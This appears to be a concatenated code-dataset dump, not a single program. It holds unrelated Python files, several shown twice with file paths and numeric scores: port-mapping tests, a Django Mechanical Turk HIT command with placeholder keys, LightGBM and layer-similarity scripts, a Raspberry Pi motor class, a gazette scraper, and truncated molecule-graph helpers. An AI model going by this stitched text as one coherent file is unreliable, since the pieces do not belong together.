{'host_forwarding':[{'host_name': 'local.gc.com',
'host_port': 80,
'container_port': 80,
'type': 'http'}]},
'gcapi':
{'host_forwarding':[{'host_name': 'local.gcapi.com',
'host_port': 8000,
'container_port': 8001,
'type': 'http'}]}}}
correct_port_spec = {'docker_compose':{'gcweb':[{'in_container_port': '80',
'mapped_host_port': '65001'}],
'gcapi':[{'in_container_port': '8001',
'mapped_host_port': '65000'}]},
'nginx':[{'proxied_port': '65000',
'host_address': 'local.gcapi.com',
'host_port': '8000',
'type': 'http'},
{'proxied_port': '65001',
'host_address': 'local.gc.com',
'host_port': '80',
'type': 'http'}],
'hosts_file':[{'forwarded_ip': '192.168.5.10',
'host_address': 'local.gcapi.com'},
{'forwarded_ip': '192.168.5.10',
'host_address': 'local.gc.com'}]}
self.assertEqual(get_port_spec_document(expanded_spec, '192.168.5.10'), correct_port_spec)
def test_get_port_spec_document_2_apps_same_host_port(self):
expanded_spec = {'apps':
{'gcweb':
{'host_forwarding':[{'host_name': 'local.gc.com',
'host_port': 80,
'container_port': 80,
'type': 'http'}]},
'gcapi':
{'host_forwarding':[{'host_name': 'local.gc.com',
'host_port': 8000,
'container_port': 8001,
'type': 'http'}]}}}
correct_port_spec = {'docker_compose':{'gcweb':[{'in_container_port': '80',
'mapped_host_port': '65001'}],
'gcapi':[{'in_container_port': '8001',
'mapped_host_port': '65000'}]},
'nginx':[{'proxied_port': '65000',
'host_address': 'local.gc.com',
'host_port': '8000',
'type': 'http'},
{'proxied_port': '65001',
'host_address': 'local.gc.com',
'host_port': '80',
'type': 'http'}],
'hosts_file':[{'forwarded_ip': '192.168.5.10',
'host_address': 'local.gc.com'}]}
self.maxDiff = None
self.assertEqual(get_port_spec_document(expanded_spec, '192.168.5.10'), correct_port_spec)
def test_port_spec_throws_full_address_error(self):
expanded_spec = {'apps':
{'gcweb':
{'host_forwarding':[{'host_name': 'local.gc.com',
'host_port': 80,
'container_port': 80,
'type': 'http'}]},
'gcapi':
{'host_forwarding':[{'host_name': 'local.gc.com',
'host_port': 80,
'container_port': 81,
'type': 'http'}]}}}
with self.assertRaises(ReusedHostFullAddress):
get_port_spec_document(expanded_spec, '192.168.5.10')
def test_port_spec_throws_stream_host_port(self):
expanded_spec = {'apps':
{'gcweb':
{'host_forwarding':[{'host_name': 'local.gc.com',
'host_port': 80,
'container_port': 80,
'type': 'stream'}]},
'gcapi':
{'host_forwarding':[{'host_name': 'local.api.com',
'host_port': 80,
'container_port': 81,
'type': 'stream'}]}}}
with self.assertRaises(ReusedStreamHostPort):
get_port_spec_document(expanded_spec, '192.168.5.10')
def test_app_with_multiple_host_forwardings(self):
expanded_spec = {'apps':
{'gcweb':
{'host_forwarding':[{'host_name': 'local.gc.com',
'host_port': 80,
'container_port': 80,
'type': 'http'},
{'host_name': 'local.gc.com',
'host_port': 81,
'container_port': 81,
'type': 'http'}]},
'gcapi':
{'host_forwarding':[{'host_name': 'local.gcapi.com',
'host_port': 82,
'container_port': 82,
'type': 'http'}]}}}
correct_port_spec = {'docker_compose':{'gcweb':[{'in_container_port': '80',
'mapped_host_port': '65001'},
{'in_container_port': '81',
'mapped_host_port': '65002'}],
'gcapi':[{'in_container_port': '82',
'mapped_host_port': '65000'}]},
'nginx':[{'proxied_port': '65000',
'host_address': 'local.gcapi.com',
'host_port': '82',
'type': 'http'},
{'proxied_port': '65001',
'host_address': 'local.gc.com',
'host_port': '80',
'type': 'http'},
{'proxied_port': '65002',
'host_address': 'local.gc.com',
'host_port': '81',
'type': 'http'}],
'hosts_file':[{'forwarded_ip': '192.168.5.10',
'host_address': 'local.gcapi.com'},
{'forwarded_ip': '192.168.5.10',
'host_address': 'local.gc.com'}]}
self.assertEqual(get_port_spec_document(expanded_spec, '192.168.5.10'), correct_port_spec) | 0.47658 | 0.149656 |
from django.core.management.base import BaseCommand, CommandError
from django.core.urlresolvers import reverse
from boto1.models import Image, Hit
from optparse import make_option
import urlparse
import boto
import boto.mturk
import boto.mturk.connection
_mturk_connexion = None
def get_connection():
global _mturk_connexion
if _mturk_connexion is None:
_mturk_connexion = boto.mturk.connection.MTurkConnection(
aws_access_key_id="my_secret",
aws_secret_access_key='my_secret_key',
debug=True,
host='mechanicalturk.sandbox.amazonaws.com')
return _mturk_connexion
def create_external_question_hit(title, url):
question = boto.mturk.question.ExternalQuestion(url, 500)
new_hit = get_connection().create_hit(
question=question,
title=title,
description="Django minimalistic test",
reward=0.02,
keywords="image,processing,segmentation")
return new_hit
class Command(BaseCommand):
help = 'Synchronize the content not sent yet to Amazon'
option_list = BaseCommand.option_list + (
make_option(
'--base_url',
dest='base_url',
default=None,
type='string',
help='The base URL of the server'),
)
def handle(self, *args, **options):
nb_hit_created = 0
if options['base_url']:
root_url = urlparse.urlparse(options['base_url'])
else:
raise RuntimeError('The base URL of the server should be set')
for image_object in Image.objects.filter(hit__isnull=False).distinct():
self.stdout.write(' * %-50s %s' % (image_object.name, ' '.join(i.hit_id for i in image_object.hit.all())))
images_to_sync = Image.objects.filter(hit__isnull=True).distinct()
for image_object in images_to_sync:
url_image = urlparse.urlunparse((root_url.scheme, root_url.netloc, root_url.path.rstrip('/') + reverse('image_annotation_form', args=[image_object.id]), '','',''))
new_hit = create_external_question_hit(
'botox',
url_image)
try:
current_hit = Hit.objects.create(image = image_object, hit_id = new_hit[0].HITId)
except Exception, e:
self.stderr.write(' hit not added to the database but added to Amazon for image %s %r' % (image_object.name, new_hit))
continue
self.stdout.write(' + %-50s %s' % (image_object.name, current_hit.hit_id))
nb_hit_created += 1
self.stdout.write('Successfully created the hits')
self.stdout.write('- New hits created %d' % nb_hit_created)
self.stdout.write('- Current number of images %d' % Image.objects.count()) | boto1/management/commands/create_hits.py | from django.core.management.base import BaseCommand, CommandError
from django.core.urlresolvers import reverse
from boto1.models import Image, Hit
from optparse import make_option
import urlparse
import boto
import boto.mturk
import boto.mturk.connection
_mturk_connexion = None
def get_connection():
global _mturk_connexion
if _mturk_connexion is None:
_mturk_connexion = boto.mturk.connection.MTurkConnection(
aws_access_key_id="my_secret",
aws_secret_access_key='my_secret_key',
debug=True,
host='mechanicalturk.sandbox.amazonaws.com')
return _mturk_connexion
def create_external_question_hit(title, url):
question = boto.mturk.question.ExternalQuestion(url, 500)
new_hit = get_connection().create_hit(
question=question,
title=title,
description="Django minimalistic test",
reward=0.02,
keywords="image,processing,segmentation")
return new_hit
class Command(BaseCommand):
help = 'Synchronize the content not sent yet to Amazon'
option_list = BaseCommand.option_list + (
make_option(
'--base_url',
dest='base_url',
default=None,
type='string',
help='The base URL of the server'),
)
def handle(self, *args, **options):
nb_hit_created = 0
if options['base_url']:
root_url = urlparse.urlparse(options['base_url'])
else:
raise RuntimeError('The base URL of the server should be set')
for image_object in Image.objects.filter(hit__isnull=False).distinct():
self.stdout.write(' * %-50s %s' % (image_object.name, ' '.join(i.hit_id for i in image_object.hit.all())))
images_to_sync = Image.objects.filter(hit__isnull=True).distinct()
for image_object in images_to_sync:
url_image = urlparse.urlunparse((root_url.scheme, root_url.netloc, root_url.path.rstrip('/') + reverse('image_annotation_form', args=[image_object.id]), '','',''))
new_hit = create_external_question_hit(
'botox',
url_image)
try:
current_hit = Hit.objects.create(image = image_object, hit_id = new_hit[0].HITId)
except Exception, e:
self.stderr.write(' hit not added to the database but added to Amazon for image %s %r' % (image_object.name, new_hit))
continue
self.stdout.write(' + %-50s %s' % (image_object.name, current_hit.hit_id))
nb_hit_created += 1
self.stdout.write('Successfully created the hits')
self.stdout.write('- New hits created %d' % nb_hit_created)
self.stdout.write('- Current number of images %d' % Image.objects.count()) | 0.298389 | 0.064036 |
import lightgbm as lgb
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
#--------------------------------
import os
os.environ["PATH"] += os.pathsep + 'C:/Program Files (x86)/Graphviz2.38/bin'
#--------------------------------
#parameters
is_regression = True
plotTree = False
#--------------------------------
#data set
#dataset = pd.read_csv('dataset/golf.txt')
dataset = pd.read_csv('dataset/golf2.txt')
#dataset = pd.read_csv('dataset/iris.data', names=["Sepal length","Sepal width","Petal length","Petal width","Decision"])
#--------------------------------
#label encoding
#you must convert both categorical features to int in LightGBM
print("label encoding procedures:")
features = []; categorical_features = []
num_of_rows = dataset.shape[0]
num_of_columns = dataset.shape[1]
num_of_classes = 1 #default for regression
for i in range(0, num_of_columns):
column_name = dataset.columns[i]
column_type = dataset[column_name].dtypes
if i != num_of_columns - 1: #skip target
features.append(column_name)
if column_type == 'object':
print(column_name,": ", end='')
feature_classes = dataset[column_name].unique()
#print(feature_classes)
if is_regression == False and i == num_of_columns - 1:
num_of_classes = len(feature_classes)
for j in range(len(feature_classes)):
feature_class = feature_classes[j]
print(feature_class," -> ",j,", ",end='')
dataset[column_name] = dataset[column_name].replace(feature_class, str(j))
if i != num_of_columns - 1: #skip target
categorical_features.append(column_name)
print("")
print("num_of_classes: ",num_of_classes)
print("features: ",features)
print("categorical features: ",categorical_features)
print("\nencoded dataset:\n",dataset.head())
#--------------------------------
target_name = dataset.columns[num_of_columns - 1]
y_train = dataset[target_name].values
x_train = dataset.drop(columns=[target_name]).values
#print(x_train); print(y_train)
lgb_train = lgb.Dataset(x_train, y_train
,feature_name = features
, categorical_feature = categorical_features
)
params = {
'task': 'train'
, 'boosting_type': 'gbdt'
, 'objective': 'regression' if is_regression == True else 'multiclass'
, 'num_class': num_of_classes
, 'metric': 'rmsle' if is_regression == True else 'multi_logloss'
, 'min_data': 1
#, 'learning_rate':0.1
, 'verbose': -1
}
gbm = lgb.train(params
, lgb_train
, num_boost_round=50
#, valid_sets=lgb_eval
)
predictions = gbm.predict(x_train)
#print(predictions)
"""for i in predictions:
print(np.argmax(i))"""
#--------------------------------
for index, instance in dataset.iterrows():
actual = instance[target_name]
if is_regression == True:
prediction = round(predictions[index])
else: #classification
prediction = np.argmax(predictions[index])
print((index+1),". actual= ",actual,", prediction= ",prediction)
if plotTree == True:
ax = lgb.plot_tree(gbm)
plt.show()
#ax = lgb.plot_importance(gbm, max_num_features=10)
#plt.show() | python/LightGBM/LightGBM.py | import lightgbm as lgb
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
#--------------------------------
import os
os.environ["PATH"] += os.pathsep + 'C:/Program Files (x86)/Graphviz2.38/bin'
#--------------------------------
#parameters
is_regression = True
plotTree = False
#--------------------------------
#data set
#dataset = pd.read_csv('dataset/golf.txt')
dataset = pd.read_csv('dataset/golf2.txt')
#dataset = pd.read_csv('dataset/iris.data', names=["Sepal length","Sepal width","Petal length","Petal width","Decision"])
#--------------------------------
#label encoding
#you must convert both categorical features to int in LightGBM
print("label encoding procedures:")
features = []; categorical_features = []
num_of_rows = dataset.shape[0]
num_of_columns = dataset.shape[1]
num_of_classes = 1 #default for regression
for i in range(0, num_of_columns):
column_name = dataset.columns[i]
column_type = dataset[column_name].dtypes
if i != num_of_columns - 1: #skip target
features.append(column_name)
if column_type == 'object':
print(column_name,": ", end='')
feature_classes = dataset[column_name].unique()
#print(feature_classes)
if is_regression == False and i == num_of_columns - 1:
num_of_classes = len(feature_classes)
for j in range(len(feature_classes)):
feature_class = feature_classes[j]
print(feature_class," -> ",j,", ",end='')
dataset[column_name] = dataset[column_name].replace(feature_class, str(j))
if i != num_of_columns - 1: #skip target
categorical_features.append(column_name)
print("")
print("num_of_classes: ",num_of_classes)
print("features: ",features)
print("categorical features: ",categorical_features)
print("\nencoded dataset:\n",dataset.head())
#--------------------------------
target_name = dataset.columns[num_of_columns - 1]
y_train = dataset[target_name].values
x_train = dataset.drop(columns=[target_name]).values
#print(x_train); print(y_train)
lgb_train = lgb.Dataset(x_train, y_train
,feature_name = features
, categorical_feature = categorical_features
)
params = {
'task': 'train'
, 'boosting_type': 'gbdt'
, 'objective': 'regression' if is_regression == True else 'multiclass'
, 'num_class': num_of_classes
, 'metric': 'rmsle' if is_regression == True else 'multi_logloss'
, 'min_data': 1
#, 'learning_rate':0.1
, 'verbose': -1
}
gbm = lgb.train(params
, lgb_train
, num_boost_round=50
#, valid_sets=lgb_eval
)
predictions = gbm.predict(x_train)
#print(predictions)
"""for i in predictions:
print(np.argmax(i))"""
#--------------------------------
for index, instance in dataset.iterrows():
actual = instance[target_name]
if is_regression == True:
prediction = round(predictions[index])
else: #classification
prediction = np.argmax(predictions[index])
print((index+1),". actual= ",actual,", prediction= ",prediction)
if plotTree == True:
ax = lgb.plot_tree(gbm)
plt.show()
#ax = lgb.plot_importance(gbm, max_num_features=10)
#plt.show() | 0.129871 | 0.222215 |
import numpy as np
import os
import argparse
from scipy.spatial.distance import pdist, squareform
def cos_sim(vector_a, vector_b):
"""
Cos Similarity
:param vector_a: vector a
:param vector_b: vector b
:return: sim
"""
return np.inner(vector_a, vector_b) / (np.linalg.norm(vector_a)*np.linalg.norm(vector_b))
def spearman(vi, vj):
def rank(ind):
l = ind.shape[0]
r = np.zeros(l)
for i in range(l):
r[ind[i]] = i
return r
assert vi.shape == vj.shape
ind_i = np.argsort(-vi)
ind_j = np.argsort(-vj)
rank_i = rank(ind_i)
rank_j = rank(ind_j)
s_corr = 1 - 6.0 * np.sum(np.square(rank_i - rank_j)) / (
vi.shape[0] * (vi.shape[0] ** 2 - 1))
return s_corr
def preprocess(matrix):
for i in range(matrix.shape[0]):
for j in range(matrix.shape[1]):
if i == j:
matrix[i, j] = 0
m = matrix.reshape(1, -1)
m_ = m[m != 0]
return m_.reshape(matrix.shape[0], matrix.shape[0]-1)
parser = argparse.ArgumentParser()
parser.add_argument('--dag-dir', dest='dag_dir', type=str)
parser.set_defaults(dag_dir='dag')
parser.add_argument('--source', dest='source', type=str)
parser.set_defaults(source='imagenet')
args = parser.parse_args()
if args.source == 'source':
list_of_layer = 'conv_0 conv_3 conv_7 conv_10 \
conv_14 conv_17 conv_20 conv_23 \
conv_27 conv_30 conv_33 conv_36 \
conv_40 conv_43 conv_46 \
conv_49 linear_1 linear_4 linear_6'.split()
elif args.source == 'imagenet':
list_of_layer = 'conv_0 conv_3 conv_7 conv_10 \
conv_14 conv_17 conv_20 conv_23 \
conv_27 conv_30 conv_33 conv_36 \
conv_40 conv_43 conv_46 \
conv_49 linear_0 linear_3 linear_6'.split()
else:
raise IOError('No such source')
target_layer = 'linear_target'
prj_dir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
dag_dir = os.path.join(prj_dir, args.dag_dir)
'''edge'''
target_feature = np.load(os.path.join(dag_dir, 'feature_{}'.format(args.source), 'feature_linear_{}.npy'.format(target_layer)))
target_feature = target_feature.reshape((target_feature.shape[0], -1))
target_edge = 1 - pdist(target_feature, 'cosine')
edge_list_vec = np.zeros((len(list_of_layer), 19900))
print('Edge:')
for i, layer in enumerate(list_of_layer):
f = np.load(os.path.join(dag_dir, 'feature_{}'.format(args.source), 'feature_{}.npy'.format(layer)))
f = f.reshape((f.shape[0], -1))
edge_list_vec[i] = 1 - pdist(f, 'cosine')
print(layer, ':', spearman(target_edge, edge_list_vec[i]))
'''node'''
target_attribution = np.load(os.path.join(dag_dir, 'node_{}'.format(args.source), 'node_linear_{}.npy'.format(target_layer)))
target_attribution = np.abs(target_attribution).mean(axis=1).reshape((target_attribution.shape[0], -1))
print('Node:')
for i, layer in enumerate(list_of_layer):
a = np.load(os.path.join(dag_dir, 'node_{}'.format(args.source), 'node_{}.npy'.format(layer)))
a = np.abs(a).mean(axis=1).reshape((a.shape[0], -1))
#a = a.mean(axis=1).reshape((a.shape[0], -1))
sim = 0
for k in range(a.shape[0]):
cos = np.inner(a[k], target_attribution[k]) / (np.linalg.norm(a[k]) * np.linalg.norm(target_attribution[k]))
sim += cos
print(layer, sim/200) | tools/layer_select.py | import numpy as np
import os
import argparse
from scipy.spatial.distance import pdist, squareform
def cos_sim(vector_a, vector_b):
"""
Cos Similarity
:param vector_a: vector a
:param vector_b: vector b
:return: sim
"""
return np.inner(vector_a, vector_b) / (np.linalg.norm(vector_a)*np.linalg.norm(vector_b))
def spearman(vi, vj):
def rank(ind):
l = ind.shape[0]
r = np.zeros(l)
for i in range(l):
r[ind[i]] = i
return r
assert vi.shape == vj.shape
ind_i = np.argsort(-vi)
ind_j = np.argsort(-vj)
rank_i = rank(ind_i)
rank_j = rank(ind_j)
s_corr = 1 - 6.0 * np.sum(np.square(rank_i - rank_j)) / (
vi.shape[0] * (vi.shape[0] ** 2 - 1))
return s_corr
def preprocess(matrix):
for i in range(matrix.shape[0]):
for j in range(matrix.shape[1]):
if i == j:
matrix[i, j] = 0
m = matrix.reshape(1, -1)
m_ = m[m != 0]
return m_.reshape(matrix.shape[0], matrix.shape[0]-1)
parser = argparse.ArgumentParser()
parser.add_argument('--dag-dir', dest='dag_dir', type=str)
parser.set_defaults(dag_dir='dag')
parser.add_argument('--source', dest='source', type=str)
parser.set_defaults(source='imagenet')
args = parser.parse_args()
if args.source == 'source':
list_of_layer = 'conv_0 conv_3 conv_7 conv_10 \
conv_14 conv_17 conv_20 conv_23 \
conv_27 conv_30 conv_33 conv_36 \
conv_40 conv_43 conv_46 \
conv_49 linear_1 linear_4 linear_6'.split()
elif args.source == 'imagenet':
list_of_layer = 'conv_0 conv_3 conv_7 conv_10 \
conv_14 conv_17 conv_20 conv_23 \
conv_27 conv_30 conv_33 conv_36 \
conv_40 conv_43 conv_46 \
conv_49 linear_0 linear_3 linear_6'.split()
else:
raise IOError('No such source')
target_layer = 'linear_target'
prj_dir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
dag_dir = os.path.join(prj_dir, args.dag_dir)
'''edge'''
target_feature = np.load(os.path.join(dag_dir, 'feature_{}'.format(args.source), 'feature_linear_{}.npy'.format(target_layer)))
target_feature = target_feature.reshape((target_feature.shape[0], -1))
target_edge = 1 - pdist(target_feature, 'cosine')
edge_list_vec = np.zeros((len(list_of_layer), 19900))
print('Edge:')
for i, layer in enumerate(list_of_layer):
f = np.load(os.path.join(dag_dir, 'feature_{}'.format(args.source), 'feature_{}.npy'.format(layer)))
f = f.reshape((f.shape[0], -1))
edge_list_vec[i] = 1 - pdist(f, 'cosine')
print(layer, ':', spearman(target_edge, edge_list_vec[i]))
'''node'''
target_attribution = np.load(os.path.join(dag_dir, 'node_{}'.format(args.source), 'node_linear_{}.npy'.format(target_layer)))
target_attribution = np.abs(target_attribution).mean(axis=1).reshape((target_attribution.shape[0], -1))
print('Node:')
for i, layer in enumerate(list_of_layer):
a = np.load(os.path.join(dag_dir, 'node_{}'.format(args.source), 'node_{}.npy'.format(layer)))
a = np.abs(a).mean(axis=1).reshape((a.shape[0], -1))
#a = a.mean(axis=1).reshape((a.shape[0], -1))
sim = 0
for k in range(a.shape[0]):
cos = np.inner(a[k], target_attribution[k]) / (np.linalg.norm(a[k]) * np.linalg.norm(target_attribution[k]))
sim += cos
print(layer, sim/200) | 0.486575 | 0.53437 |
try:
import RPi.GPIO as gpio
except ImportError:
import components.gpio as gpio
class Engine:
"""
Base class for all engines.
Provides basic functionality like forwards, backwards and stop.
"""
# Possible engine states
state = {
"FORWARD": (gpio.HIGH, gpio.LOW, gpio.HIGH),
"BACKWARD": (gpio.LOW, gpio.HIGH, gpio.HIGH),
"STOP": (gpio.LOW, gpio.LOW, gpio.LOW),
}
def __init__(self, pinConfiguration):
"""
Initalizes a new engine object with the given pin configuration.
The configuration should include two output and one pwm pin.
Keyword arguments:
pinConfiguraton (tuple) -- The pins on the pi board (pin1,pin2,pinpwm)
"""
pin1, pin2, pinPWM = pinConfiguration
# Pins
self.pin1 = pin1
self.pin2 = pin2
self.pinPWM = pinPWM
# Current powerlevel
self.power = 0
# setup pins as outputs
gpio.setup((self.pin1, self.pin2, self.pinPWM),
gpio.OUT)
# initialize pwm with 100%
self.pwm = gpio.PWM(self.pinPWM, 100)
def set_state(self, state, power):
"""
Sets output pins to the given state.
Keyword arguments:
state -- The engine state to set
power -- The pwm powerlevel to set
"""
self.power = power
if power != 0:
self.pwm.start(self.power)
gpio.output((self.pin1, self.pin2, self.pinPWM), state)
def forward(self, power):
"""
Engine going forwards with the given pwm power.
"""
self.set_state(Engine.state.get('FORWARD'), power)
def backward(self, power):
"""
Engine going backwards with the given pwm power.
"""
self.set_state(Engine.state.get('BACKWARD'), power)
def stop(self):
"""
Stops the engine and sets power to zero.
"""
self.set_state(Engine.state.get('STOP'), 0)
class Claw(Engine):
def open_with(self, power):
self.forward(power)
def close_with(self, power):
self.backward(power)
class Drive(Engine):
def forward_with(self, power):
self.forward(power)
def backward_with(self, power):
self.backward(power)
class Lift(Engine):
def upward_with(self, power):
self.forward(power)
def downward_with(self, power):
self.backward(power) | components/engine.py | try:
import RPi.GPIO as gpio
except ImportError:
import components.gpio as gpio
class Engine:
"""
Base class for all engines.
Provides basic functionality like forwards, backwards and stop.
"""
# Possible engine states
state = {
"FORWARD": (gpio.HIGH, gpio.LOW, gpio.HIGH),
"BACKWARD": (gpio.LOW, gpio.HIGH, gpio.HIGH),
"STOP": (gpio.LOW, gpio.LOW, gpio.LOW),
}
def __init__(self, pinConfiguration):
"""
Initalizes a new engine object with the given pin configuration.
The configuration should include two output and one pwm pin.
Keyword arguments:
pinConfiguraton (tuple) -- The pins on the pi board (pin1,pin2,pinpwm)
"""
pin1, pin2, pinPWM = pinConfiguration
# Pins
self.pin1 = pin1
self.pin2 = pin2
self.pinPWM = pinPWM
# Current powerlevel
self.power = 0
# setup pins as outputs
gpio.setup((self.pin1, self.pin2, self.pinPWM),
gpio.OUT)
# initialize pwm with 100%
self.pwm = gpio.PWM(self.pinPWM, 100)
def set_state(self, state, power):
"""
Sets output pins to the given state.
Keyword arguments:
state -- The engine state to set
power -- The pwm powerlevel to set
"""
self.power = power
if power != 0:
self.pwm.start(self.power)
gpio.output((self.pin1, self.pin2, self.pinPWM), state)
def forward(self, power):
"""
Engine going forwards with the given pwm power.
"""
self.set_state(Engine.state.get('FORWARD'), power)
def backward(self, power):
"""
Engine going backwards with the given pwm power.
"""
self.set_state(Engine.state.get('BACKWARD'), power)
def stop(self):
"""
Stops the engine and sets power to zero.
"""
self.set_state(Engine.state.get('STOP'), 0)
class Claw(Engine):
def open_with(self, power):
self.forward(power)
def close_with(self, power):
self.backward(power)
class Drive(Engine):
def forward_with(self, power):
self.forward(power)
def backward_with(self, power):
self.backward(power)
class Lift(Engine):
def upward_with(self, power):
self.forward(power)
def downward_with(self, power):
self.backward(power) | 0.698227 | 0.496277 |
import datetime
import re
import dateparser
import scrapy
from gazette.items import Gazette
from gazette.spiders.base import BaseGazetteSpider
class SpSaoGoncaloDoAmarante(BaseGazetteSpider):
"""
<NAME> has a primary url with
recent gazettes (https://saogoncalo.rn.gov.br/diario-oficial/)
and another with old gazettes (https://saogoncalo.rn.gov.br/jornal-oficial/).
The transition date of the urls occurred on 22/03/2017.
The gazettes available in the old url can be obtained by directly accessing the page of the year.
"""
TERRITORY_ID = "2412005"
name = "rn_sao_goncalo_do_amarante"
allowed_domains = ["saogoncalo.rn.gov.br"]
start_date = datetime.date(2013, 1, 2)
transition_date = datetime.date(2017, 3, 22)
NEW_URL = "https://saogoncalo.rn.gov.br/diario-oficial/"
OLD_URL = "https://saogoncalo.rn.gov.br/jom-{year}/"
PDF_URL = (
"https://saogoncalo.rn.gov.br/wp-content/uploads/{year}/{month}/{name}.pdf"
)
def start_requests(self):
"""
Yields a request for the new page and a request for each year from the start date to the transition date
"""
yield scrapy.Request(self.NEW_URL, callback=self.parse_page_after_transition)
if self.start_date < self.transition_date:
for year in list(
range(self.start_date.year, self.transition_date.year + 1)
):
yield scrapy.Request(
self.OLD_URL.format(year=year),
callback=self.parse_page_before_transition,
)
def parse_page_after_transition(self, response):
document_list = response.css(".post-attachment")
for document in document_list:
yield self.get_gazette(document=document, is_after_transition=True)
def parse_page_before_transition(self, response):
document_list = response.css(".inner a")
for document in document_list:
yield self.get_gazette(document=document, is_after_transition=False)
def get_file_url(self, title, date):
name = re.sub("[ -]+", "-", title)
month = str(date.month).zfill(2)
year = date.year
return self.PDF_URL.format(year=year, month=month, name=name)
def get_gazette(self, document, is_after_transition):
"""
Extract the information from the document and return a Gazette item
"""
title = document.css("::text").get()
edition_number = re.search(r"\d+", title).group(0)
is_extra_edition = bool(re.search(r"EXTRA", title, re.IGNORECASE))
date_text = re.search(
r"(\d{1,2}\w+\d{4})|(\d{1,2}.\d{1,2}.\d{4})", title
).group(0)
date = dateparser.parse(date_text, languages=["pt"]).date()
if is_after_transition:
file_url = self.get_file_url(title, date)
else:
file_url = document.css("::attr(href)").get()
return Gazette(
date=date,
edition_number=edition_number,
file_urls=[file_url],
power="executive_legislative",
is_extra_edition=is_extra_edition,
) | data_collection/gazette/spiders/rn_sao_goncalo_do_amarante.py | import datetime
import re
import dateparser
import scrapy
from gazette.items import Gazette
from gazette.spiders.base import BaseGazetteSpider
class SpSaoGoncaloDoAmarante(BaseGazetteSpider):
"""
<NAME> has a primary url with
recent gazettes (https://saogoncalo.rn.gov.br/diario-oficial/)
and another with old gazettes (https://saogoncalo.rn.gov.br/jornal-oficial/).
The transition date of the urls occurred on 22/03/2017.
The gazettes available in the old url can be obtained by directly accessing the page of the year.
"""
TERRITORY_ID = "2412005"
name = "rn_sao_goncalo_do_amarante"
allowed_domains = ["saogoncalo.rn.gov.br"]
start_date = datetime.date(2013, 1, 2)
transition_date = datetime.date(2017, 3, 22)
NEW_URL = "https://saogoncalo.rn.gov.br/diario-oficial/"
OLD_URL = "https://saogoncalo.rn.gov.br/jom-{year}/"
PDF_URL = (
"https://saogoncalo.rn.gov.br/wp-content/uploads/{year}/{month}/{name}.pdf"
)
def start_requests(self):
"""
Yields a request for the new page and a request for each year from the start date to the transition date
"""
yield scrapy.Request(self.NEW_URL, callback=self.parse_page_after_transition)
if self.start_date < self.transition_date:
for year in list(
range(self.start_date.year, self.transition_date.year + 1)
):
yield scrapy.Request(
self.OLD_URL.format(year=year),
callback=self.parse_page_before_transition,
)
def parse_page_after_transition(self, response):
document_list = response.css(".post-attachment")
for document in document_list:
yield self.get_gazette(document=document, is_after_transition=True)
def parse_page_before_transition(self, response):
document_list = response.css(".inner a")
for document in document_list:
yield self.get_gazette(document=document, is_after_transition=False)
def get_file_url(self, title, date):
name = re.sub("[ -]+", "-", title)
month = str(date.month).zfill(2)
year = date.year
return self.PDF_URL.format(year=year, month=month, name=name)
def get_gazette(self, document, is_after_transition):
"""
Extract the information from the document and return a Gazette item
"""
title = document.css("::text").get()
edition_number = re.search(r"\d+", title).group(0)
is_extra_edition = bool(re.search(r"EXTRA", title, re.IGNORECASE))
date_text = re.search(
r"(\d{1,2}\w+\d{4})|(\d{1,2}.\d{1,2}.\d{4})", title
).group(0)
date = dateparser.parse(date_text, languages=["pt"]).date()
if is_after_transition:
file_url = self.get_file_url(title, date)
else:
file_url = document.css("::attr(href)").get()
return Gazette(
date=date,
edition_number=edition_number,
file_urls=[file_url],
power="executive_legislative",
is_extra_edition=is_extra_edition,
) | 0.537527 | 0.328987 |
from collections import OrderedDict
import numpy as np
from .. import Chem, chemutils
from ..vocabulary import AtomTuple
try:
from ..genric_extensions import molecule_representation as mr_native
except ImportError:
from . import _implementation_python as mr_native
from ._implementation_python import atom_features, bond_features, ELEM_LIST, ATOM_FDIM, BOND_FDIM
MAX_NB = 6
def ring_info(mol):
ring_bond_idx = []
ring_bond_order = []
num_bonds = 0
for i, bond in enumerate(mol.GetBonds()):
if not bond.IsInRing():
continue
num_bonds += 1
bond_order = int(AtomTuple.from_atom(bond.GetBeginAtom()) < AtomTuple.from_atom(bond.GetEndAtom()))
ring_bond_idx.append(2 * i)
ring_bond_idx.append(2 * i + 1)
ring_bond_order.append(bond_order)
ring_bond_order.append(1 - bond_order)
return np.array(ring_bond_idx, dtype=np.int32), np.array(ring_bond_order, dtype=np.int32)
def _normalize_adjacency_values(values, normalization):
if normalization == 'sum':
return np.ones_like(values)
elif normalization == 'sqrt':
return values
elif normalization == 'mean':
return np.square(values, out=values)
else:
raise ValueError("Unknown normalization type {0}".format(normalization))
def atom_bond_list(mol, normalization='sum'):
""" Computes the atom-bond incidence list.
This method computes the atom-bond incidence list.
For each atom (row), the bonds it belongs to are enumerated, and recorded
in the ith column as an index.
Parameters
----------
mol: a rdkit molecule for which to compute the list.
normalization: 'sum', 'mean' or 'sqrt'. The normalization to apply.
Returns
-------
Elements with represent a sparse matrix in COO format.
"""
index = np.empty((2, 2 * mol.GetNumBonds()), dtype=np.int32)
values = np.empty(2 * mol.GetNumBonds(), dtype=np.float32)
mr_native.fill_atom_bond_list_sparse(values, index, mol)
values = _normalize_adjacency_values(values, normalization)
return index, values, (mol.GetNumAtoms(), 2 * mol.GetNumBonds())
def atom_bond_list_segment(mol):
""" Computes the atom-bond incidence list in segmented form.
This function returns the atom-bond list in segmented format.
Parameters
----------
mol: a rdkit molecule for which to compute the list.
"""
scopes = np.empty((mol.GetNumAtoms(), 2), dtype=np.int32)
index = np.empty(2 * mol.GetNumBonds(), dtype=np.int32)
mr_native.fill_atom_bond_list_segment(scopes, index, mol)
return scopes, index
def bond_incidence_list(mol, normalization='sum'):
""" Computes the bond-bond incidence list.
This method computes the bond-bond incidence list.
For each ordered bond (row), the (ordered) bonds with which it shares
an atom are enumerated, and are recorded in the ith column as a bond index.
When recording incident bonds, only incoming bonds are recorded (that is, the
orientation of the bond is such that the second atom is shared with the bond
being considered).
Parameters
----------
mol: a rdkit molecule for which to compute the list.
normalization: 'sum', 'mean' or 'sqrt'. The normalization to apply.
Returns
-------
a 2-d numpy array representing the given list. It has length 2 * num_bonds + 1.
"""
num_elements = mr_native.get_edge_incidence_size(mol)
index = np.empty((2, num_elements), dtype=np.int32)
values = np.empty(num_elements, dtype=np.float32)
mr_native.fill_bond_incidence_list_sparse(values, index, mol)
